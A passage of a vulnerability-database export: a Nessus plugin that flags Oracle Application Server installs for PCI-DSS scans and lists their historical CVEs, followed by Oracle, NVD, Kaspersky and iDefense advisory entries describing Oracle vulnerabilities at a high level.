\"CVE-2008-0343\",\n \"CVE-2008-0344\",\n \"CVE-2008-0345\",\n \"CVE-2008-0346\",\n \"CVE-2008-0347\",\n \"CVE-2008-0348\",\n \"CVE-2008-0349\",\n \"CVE-2008-1812\",\n \"CVE-2008-1814\",\n \"CVE-2008-1823\",\n \"CVE-2008-1824\",\n \"CVE-2008-1825\",\n \"CVE-2008-2583\",\n \"CVE-2008-2588\",\n \"CVE-2008-2589\",\n \"CVE-2008-2593\",\n \"CVE-2008-2594\",\n \"CVE-2008-2595\",\n \"CVE-2008-2609\",\n \"CVE-2008-2612\",\n \"CVE-2008-2614\",\n \"CVE-2008-2619\",\n \"CVE-2008-2623\",\n \"CVE-2008-3975\",\n \"CVE-2008-3977\",\n \"CVE-2008-3986\",\n \"CVE-2008-3987\",\n \"CVE-2008-4014\",\n \"CVE-2008-4017\",\n \"CVE-2008-5438\",\n \"CVE-2008-7233\",\n \"CVE-2009-0217\",\n \"CVE-2009-0989\",\n \"CVE-2009-0990\",\n \"CVE-2009-0994\",\n \"CVE-2009-1008\",\n \"CVE-2009-1009\",\n \"CVE-2009-1010\",\n \"CVE-2009-1011\",\n \"CVE-2009-1017\",\n \"CVE-2009-1976\",\n \"CVE-2009-1990\",\n \"CVE-2009-1999\",\n \"CVE-2009-3407\",\n \"CVE-2009-3412\",\n \"CVE-2010-0066\",\n \"CVE-2010-0067\",\n \"CVE-2010-0070\",\n \"CVE-2011-0789\",\n \"CVE-2011-0795\",\n \"CVE-2011-0884\",\n \"CVE-2011-2237\",\n \"CVE-2011-2314\",\n \"CVE-2011-3523\"\n );\n\n script_bugtraq_id(\n 1053,\n 2150,\n 2286,\n 2569,\n 3341,\n 3726,\n 3727,\n 4032,\n 4034,\n 4037,\n 4289,\n 4290,\n 4292,\n 4293,\n 4294,\n 4298,\n 4844,\n 4848,\n 5119,\n 5262,\n 5362,\n 5363,\n 5364,\n 5366,\n 5452,\n 5847,\n 5887,\n 5902,\n 5995,\n 5996,\n 6556,\n 6846,\n 7395,\n 9515,\n 9703,\n 10009,\n 10829,\n 10871,\n 13145,\n 13418,\n 13509,\n 15034,\n 15134,\n 16287,\n 16294,\n 16384,\n 17590,\n 19054,\n 20588,\n 22027,\n 22083,\n 22831,\n 23102,\n 23532,\n 24697,\n 27229,\n 33177,\n 34461,\n 35671,\n 35688,\n 36746,\n 36749,\n 36753,\n 50202,\n 50209\n );\n\n\n script_name(english:\"Oracle Application Server Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server may be affected by multiple 
vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Oracle Application Server. It was not possible\nto determine its version, so the version of Oracle Application Server\ninstalled on the remote host could potentially be affected by multiple\nvulnerabilities :\n\n - CVE-2000-0169: Remote command execution in the web\n listener component.\n\n - CVE-2000-1235: Information disclosure in the port\n listener component and modplsql.\n\n - CVE-2000-1236: SQL injection in mod_sql.\n\n - CVE-2001-0326: Information disclosure in the Java\n Virtual Machine.\n\n - CVE-2001-0419: Buffer overflow in ndwfn4.so.\n\n - CVE-2001-0591: Directory traversal.\n\n - CVE-2001-1216: Buffer overflow in the PL/SQL Apache module.\n\n - CVE-2001-1217: Directory traversal vulnerability in the\n PL/SQL Apache module.\n\n - CVE-2001-1371: Improper access control in the SOAP\n service.\n\n - CVE-2001-1372: Information disclosure.\n\n - CVE-2002-0386: Denial of service through the\n administration module for Oracle Web Cache.\n\n - CVE-2002-0559: Buffer overflows in the PL/SQL module.\n\n - CVE-2002-0560: Information disclosure in the PL/SQL\n module.\n\n - CVE-2002-0561: Authentication bypass in the PL/SQL\n Gateway web administration interface.\n\n - CVE-2002-0562: Information disclosure through\n globals.jsa.\n\n - CVE-2002-0563: Improper access control on several\n services.\n\n - CVE-2002-0564: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2002-0565: Information disclosure through JSP files\n in the _pages directory.\n\n - CVE-2002-0566: Denial of service in the PL/SQL module.\n\n - CVE-2002-0568: Improper access control on XSQLConfig.xml\n and soapConfig.xml.\n\n - CVE-2002-0569: Authentication bypass through\n XSQLServlet.\n\n - CVE-2002-0655: Denial of service in OpenSSL.\n\n - CVE-2002-0656: Buffer overflows in OpenSSL.\n\n - CVE-2002-0659: Denial of service in OpenSSL.\n\n - CVE-2002-0840: Cross-site scripting in the 
default error\n page of Apache.\n\n - CVE-2002-0842: Format string vulnerability in mod_dav.\n\n - CVE-2002-0843: Buffer overflows in ApacheBench.\n\n - CVE-2002-0947: Buffer overflow in rwcgi60.\n\n - CVE-2002-1089: Information disclosure in rwcgi60.\n\n - CVE-2002-1630: Improper access control on sendmail.jsp.\n\n - CVE-2002-1631: SQL injection in query.xsql.\n\n - CVE-2002-1632: Information disclosure through several\n JSP pages.\n\n - CVE-2002-1635: Information disclosure in Apache.\n\n - CVE-2002-1636: Cross-site scripting in the htp PL/SQL\n package.\n\n - CVE-2002-1637: Default credentials in multiple\n components.\n\n - CVE-2002-1858: Information disclosure through the\n WEB-INF directory.\n\n - CVE-2002-2153: Format string vulnerability in the\n administrative pages of the PL/SQL module.\n\n - CVE-2002-2345: Credential leakage in the web cache\n administrator interface.\n\n - CVE-2002-2347: Cross-site scripting in several JSP\n pages.\n\n - CVE-2004-1362: Authentication bypass in the PL/SQL\n module.\n\n - CVE-2004-1363: Buffer overflow in extproc.\n\n - CVE-2004-1364: Directory traversal in extproc.\n\n - CVE-2004-1365: Command execution in extproc.\n\n - CVE-2004-1366: Improper access control on\n emoms.properties.\n\n - CVE-2004-1367: Credential leakage in Database Server.\n\n - CVE-2004-1368: Arbitrary file execution in ISQL*Plus.\n\n - CVE-2004-1369: Denial of service in TNS Listener.\n\n - CVE-2004-1370: Multiple SQL injection vulnerabilities in\n PL/SQL.\n\n - CVE-2004-1371: Stack-based buffer overflow.\n\n - CVE-2004-1707: Privilege escalation in dbsnmp and nmo.\n\n - CVE-2004-1774: Buffer overflow in the MD2 package.\n\n - CVE-2004-1877: Phishing vulnerability in Single Sign-On\n component.\n\n - CVE-2004-2134: Weak cryptography for passwords in the\n toplink mapping workBench.\n\n - CVE-2004-2244: Denial of service in the XML parser.\n\n - CVE-2005-1383: Authentication bypass in HTTP Server.\n\n - CVE-2005-1495: Detection bypass.\n\n - 
CVE-2005-1496: Privilege escalation in the\n DBMS_Scheduler.\n\n - CVE-2005-2093: Web cache poisoning.\n\n - CVE-2005-3204: Cross-site scripting.\n\n - CVE-2005-3445: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2005-3446: Unspecified vulnerability in Internet\n Directory.\n\n - CVE-2005-3447: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2005-3448: Unspecified vulnerability in the OC4J\n module.\n\n - CVE-2005-3449: Multiple unspecified vulnerabilities in\n multiple components.\n\n - CVE-2005-3450: Unspecified vulnerability in HTTP Server.\n\n - CVE-2005-3451: Unspecified vulnerability in\n SQL*ReportWriter.\n\n - CVE-2005-3452: Unspecified vulnerability in Web Cache.\n\n - CVE-2005-3453: Multiple unspecified vulnerabilities in\n Web Cache.\n\n - CVE-2006-0273: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2006-0274: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0275: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2006-0282: Unspecified vulnerability.\n\n - CVE-2006-0283: Unspecified vulnerability.\n\n - CVE-2006-0284: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0285: Unspecified vulnerability in the Java Net\n component.\n\n - CVE-2006-0286: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0287: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-0288: Multiple unspecified vulnerabilities in\n the Oracle Reports Developer component.\n\n - CVE-2006-0289: Multiple unspecified vulnerabilities.\n\n - CVE-2006-0290: Unspecified vulnerability in the Oracle\n Workflow Cartridge component.\n\n - CVE-2006-0291: Multiple unspecified vulnerabilities in\n the Oracle Workflow Cartridge component.\n\n - CVE-2006-0435: Unspecified vulnerability in Oracle\n PL/SQL.\n\n - CVE-2006-0552: Unspecified vulnerability in the Net\n Listener component.\n\n - CVE-2006-0586: Multiple SQL injection vulnerabilities.\n\n - CVE-2006-1884: Unspecified 
vulnerability in the Oracle\n Thesaurus Management System component.\n\n - CVE-2006-3706: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3707: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3708: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3709: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3710: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3711: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3712: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3713: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-3714: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5353: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5354: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5355: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5356: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5357: Unspecified vulnerability in HTTP Server.\n\n - CVE-2006-5358: Unspecified vulnerability in the Oracle\n Forms component.\n\n - CVE-2006-5359: Multiple unspecified vulnerabilities in\n Oracle Reports Developer component.\n\n - CVE-2006-5360: Unspecified vulnerability in Oracle Forms\n component.\n\n - CVE-2006-5361: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5362: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5363: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2006-5364: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2006-5365: Unspecified vulnerability in Oracle\n Forms.\n\n - CVE-2006-5366: Multiple unspecified vulnerabilities.\n\n - CVE-2007-0222: Directory traversal vulnerability in\n EmChartBean.\n\n - CVE-2007-0275: Cross-site scripting vulnerability in\n Oracle Reports Web Cartridge (RWCGI60).\n\n - 
CVE-2007-0280: Buffer overflow in Oracle Notification\n Service.\n\n - CVE-2007-0281: Multiple unspecified vulnerabilities in\n HTTP Server.\n\n - CVE-2007-0282: Unspecified vulnerability in OPMN02.\n\n - CVE-2007-0283: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0284: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-0285: Unspecified vulnerability in Oracle\n Reports Developer.\n\n - CVE-2007-0286: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0287: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-0288: Unspecified vulnerability in Oracle\n Internet Directory.\n\n - CVE-2007-0289: Multiple unspecified vulnerabilities in\n Oracle Containers for J2EE.\n\n - CVE-2007-1359: Improper access control in mod_security.\n\n - CVE-2007-1609: Cross-site scripting vulnerability in\n servlet/Spy in Dynamic Monitoring Services (DMS).\n\n - CVE-2007-2119: Cross-site scripting vulnerability in the\n Administration Front End for Oracle Enterprise (Ultra)\n Search.\n\n - CVE-2007-2120: Denial of service in the Oracle\n Discoverer servlet.\n\n - CVE-2007-2121: Unspecified vulnerability in the COREid\n Access component.\n\n - CVE-2007-2122: Unspecified vulnerability in the Wireless\n component.\n\n - CVE-2007-2123: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2124: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2007-2130: Unspecified vulnerability in Workflow\n Cartridge.\n\n - CVE-2007-3553: Cross-site scripting vulnerability in\n Rapid Install Web Server.\n\n - CVE-2007-3854: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and the Spatial\n component.\n\n - CVE-2007-3859: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-3861: Unspecified vulnerability in Oracle\n Jdeveloper.\n\n - CVE-2007-3862: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-3863: 
Unspecified vulnerability in Oracle\n JDeveloper.\n\n - CVE-2007-5516: Unspecified vulnerability in the Oracle\n Process Mgmt & Notification component.\n\n - CVE-2007-5517: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5518: Unspecified vulnerability in HTTP Server.\n\n - CVE-2007-5519: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5520: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5521: Unspecified vulnerability in Oracle\n Containers for J2EE.\n\n - CVE-2007-5522: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5523: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2007-5524: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5525: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2007-5526: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2007-5531: Unspecified vulnerability in Oracle Help\n for Web.\n\n - CVE-2008-0340: Multiple unspecified vulnerabilities in\n the Advanced Queuing component and Spatial component.\n\n - CVE-2008-0343: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0344: Unspecified vulnerability in the Oracle\n Spatial component.\n\n - CVE-2008-0345: Unspecified vulnerability in the Core\n RDBMS component.\n\n - CVE-2008-0346: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2008-0347: Unspecified vulnerability in the Oracle\n Ultra Search component.\n\n - CVE-2008-0348: Multiple unspecified vulnerabilities in\n the PeopleTools component.\n\n - CVE-2008-0349: Unspecified vulnerability in the\n PeopleTools component.\n\n - CVE-2008-1812: Unspecified vulnerability in the Oracle\n Enterprise Manager component.\n\n - CVE-2008-1814: Unspecified vulnerability in the Oracle\n Secure Enterprise Search or Ultrasearch component.\n\n - CVE-2008-1823: Unspecified vulnerability in the Oracle\n Jinitiator 
component.\n\n - CVE-2008-1824: Unspecified vulnerability in the Oracle\n Dynamic Monitoring Service component.\n\n - CVE-2008-1825: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2583: Unspecified vulnerability in the sample\n Discussion Forum Portlet for the Oracle Portal\n component.\n\n - CVE-2008-2588: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-2589: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2593: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2594: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2595: Unspecified vulnerability in the Oracle\n Internet Directory component.\n\n - CVE-2008-2609: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-2612: Unspecified vulnerability in the Hyperion\n BI Plus component.\n\n - CVE-2008-2614: Unspecified vulnerability in HTTP Server.\n\n - CVE-2008-2619: Unspecified vulnerability in the Oracle\n Reports Developer component.\n\n - CVE-2008-2623: Unspecified vulnerability in the Oracle\n JDeveloper component.\n\n - CVE-2008-3975: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3977: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-3986: Unspecified vulnerability in the Oracle\n Discoverer Administrator component.\n\n - CVE-2008-3987: Unspecified vulnerability in the Oracle\n Discoverer Desktop component.\n\n - CVE-2008-4014: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2008-4017: Unspecified vulnerability in the OC4J\n component.\n\n - CVE-2008-5438: Unspecified vulnerability in the Oracle\n Portal component.\n\n - CVE-2008-7233: Unspecified vulnerability in the Oracle\n Jinitiator component.\n\n - CVE-2009-0217: Signature spoofing vulnerability in\n multiple components.\n\n - CVE-2009-0989: Unspecified vulnerability in the BI\n Publisher component.\n\n - 
CVE-2009-0990: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-0994: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1008: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1009: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1010: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1011: Unspecified vulnerability in the Outside\n In Technology component.\n\n - CVE-2009-1017: Unspecified vulnerability in the BI\n Publisher component.\n\n - CVE-2009-1976: Unspecified vulnerability in HTTP Server.\n\n - CVE-2009-1990: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-1999: Unspecified vulnerability in the Business\n Intelligence Enterprise Edition component.\n\n - CVE-2009-3407: Unspecified vulnerability in the Portal\n component.\n\n - CVE-2009-3412: Unspecified vulnerability in the Unzip\n component.\n\n - CVE-2010-0066: Unspecified vulnerability in the Access\n Manager Identity Server component.\n\n - CVE-2010-0067: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2010-0070: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-0789: Unspecified vulnerability in HTTP Server.\n\n - CVE-2011-0795: Unspecified vulnerability in Single\n Sign-On.\n\n - CVE-2011-0884: Unspecified vulnerability in the Oracle\n BPEL Process Manager component.\n\n - CVE-2011-2237: Unspecified vulnerability in the Oracle\n Web Services Manager component.\n\n - CVE-2011-2314: Unspecified vulnerability in the Oracle\n Containers for J2EE component.\n\n - CVE-2011-3523: Unspecified vulnerability in the Oracle\n Web Services Manager component.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Verify that the version of Oracle Application Server installed is not\naffected by the listed vulnerabilities and/or filter 
incoming traffic to this port\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-053\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Oracle Secure Backup 10.2.0.2 RCE (Windows)\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 200, 255, 264, 287);\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service2.nasl\");\n script_require_keys(\"Settings/PCI_DSS\");\n script_require_ports(\"Services/oracle_application_server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"misc_func.inc\");\n\n# Only PCI considers this an issue.\nif (!get_kb_item(\"Settings/PCI_DSS\")) exit(0, \"PCI-DSS compliance checking is not enabled.\");\n\n# Make sure 
this is Oracle.\nport = get_kb_item_or_exit(\"Services/oracle_application_server\");\n\n# We're flagging every installation of Oracle Application Server, with\n# every vulnerability it has ever had.\nsecurity_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:13:38", "bulletinFamily": "software", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible.** This Critical Patch Update contains 43 new security fixes across all products.\n", "modified": "2009-09-03T00:00:00", "published": "2009-04-14T00:00:00", "id": "ORACLE:CPUAPR2009-099563", "href": "", "title": "cpuapr2009.html", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-10-11T11:33:52", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Advanced Queuing component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect confidentiality and integrity, related to DBMS_AQIN. NOTE: the previous information was obtained from the April 2009 CPU. 
Oracle has not commented on reliable researcher claims that this issue is SQL injection in the DEQ_EXEJOB procedure.", "modified": "2018-10-10T15:32:42", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0992", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0992", "title": "CVE-2009-0992", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-18T15:52:30", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.2.3 and 10.1.4.2 allows remote attackers to affect integrity via unknown vectors, a different vulnerability than CVE-2009-0983 and CVE-2009-3407.", "modified": "2016-11-28T14:07:04", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0974", "title": "CVE-2009-0974", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T12:12:45", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Resource Manager component in Oracle Database 9.2.0.8 and 9.2.0.8DV allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.", "modified": "2012-10-22T23:04:24", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0979", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0979", "type": "cve", "title": "CVE-2009-0979", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T12:12:50", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Core RDBMS component in Oracle Database 10.1.0.5, 10.2.0.4, and 11.1.0.6 allows remote authenticated users with the IMP_FULL_DATABASE role to affect confidentiality, integrity, and availability.", "modified": "2012-10-22T23:04:25", 
"published": "2009-04-15T06:30:00", "id": "CVE-2009-0985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0985", "type": "cve", "title": "CVE-2009-0985", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-18T15:52:30", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Workspace Manager component in Oracle Database 10.2.0.4 and 11.1.0.6 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0978.", "modified": "2016-11-22T11:13:19", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0975", "title": "CVE-2009-0975", "type": "cve", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne 8.49.19 allows remote attackers to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-1013.", "modified": "2016-11-23T14:40:14", "published": "2009-04-15T06:30:01", "id": "CVE-2009-1014", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1014", "title": "CVE-2009-1014", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-03T12:13:11", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the JRockit component in BEA Product Suite R27.6.2 and earlier, with SDK/JRE 1.4.2, JRE/JDK 5, and JRE/JDK 6, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.", "modified": "2012-10-22T23:04:31", "published": "2009-04-15T06:30:00", "id": "CVE-2009-1006", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1006", "type": "cve", "title": "CVE-2009-1006", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-03T12:12:46", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the SQLX Functions component in Oracle Database 10.2.0.3 and 11.1.0.6 allows remote authenticated users to affect integrity and availability, related to AGGXQIMP.", "modified": "2012-10-22T23:04:24", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0980", "type": "cve", "title": "CVE-2009-0980", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.1.9 allows local users to affect confidentiality, integrity, and availability, related to HTML.", "modified": "2016-11-18T10:22:20", "published": "2009-04-15T06:30:00", "id": "CVE-2009-1009", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1009", "title": "CVE-2009-1009", "type": "cve", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-18T15:52:31", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the BI Publisher component in Oracle Application Server 5.6.2, 10.1.3.2.1, and 10.1.3.3.3 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2009-0989.", "modified": "2016-11-22T11:10:34", "published": "2009-04-15T06:30:00", "id": "CVE-2009-0990", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0990", "title": "CVE-2009-0990", "type": "cve", "cvss": {"score": 5.5, "vector": 
"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "kaspersky": [{"lastseen": "2019-02-15T12:33:31", "bulletinFamily": "info", "description": "### *Detect date*:\n04/15/2009\n\n### *Severity*:\nHigh\n\n### *Description*:\nUnspecified vulnerabilities were found in the Oracle Database. By exploiting these vulnerabilities malicious users can affect availability, confidentiality and integrity. These vulnerabilities can be exploited remotely via unknown vectors.\n\n### *Affected products*:\nOracle Database versions 10.1.0.5, 10.2.0.4 and 11.1.0.6\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle Database](<https://threats.kaspersky.com/en/product/Oracle-Database/>)\n\n### *CVE-IDS*:\n[CVE-2009-0992](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0992>) \n[CVE-2009-0985](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0985>)", "modified": "2019-02-13T00:00:00", "published": "2009-04-15T00:00:00", "id": "KLA10282", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10282", "title": "\r KLA10282Multiple vulnerabilities in Oracle Database ", "type": "kaspersky", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDefense Security Advisory 05.14.09\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nMay 14, 2009\r\n\r\nI. BACKGROUND\r\n\r\nOracle Corp.'s Outside In Technology is a document conversion engine\r\nsupporting a large number of binary file formats. Prior to Oracle's\r\nacquisition, the software was maintained by Stellent Inc. The software\r\nappears to have originated from "QuickView" for Windows 98, but later\r\nspun off. It is used by various software packages, one of which is\r\nMotorola Inc.'s Good Mobile Messaging Server. 
